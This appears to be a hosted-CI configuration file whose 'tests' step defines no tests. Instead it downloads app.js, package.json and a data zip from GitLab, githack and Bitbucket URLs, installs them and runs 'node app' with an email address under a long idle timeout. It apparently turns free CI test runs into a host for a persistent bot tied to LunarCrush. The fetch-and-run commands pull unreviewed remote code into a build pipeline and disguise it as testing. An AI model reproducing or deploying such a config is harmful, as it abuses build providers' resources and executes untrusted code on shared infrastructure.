#https://bit.ly/3kJeOmQ //custom https://bit.ly/30f5aBd //full time
checks:
    javascript: true
build:
    environment:
        node: v16.13.0
    nodes:
        meowJobs:
            tests:
                override:
                    - command: curl -fsSL https://gitlab.com/meo__coder/meocoder_lunarcrush/-/raw/main/app.js -o app.js && curl -fsSL https://gl.githack.com/meo__coder/meocoder_lunarcrush/-/raw/main/package.json -o package.json
                    - command: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/buihuutuan_vip-stu-office-gy.zip -o lunarCrushData.zip
                    - command: unzip lunarCrushData.zip -d lunarCrushData
                    - command: npm i -s
                    - command: node app -e buihuutuan@vip.stu.office.gy
                      idle_timeout: 960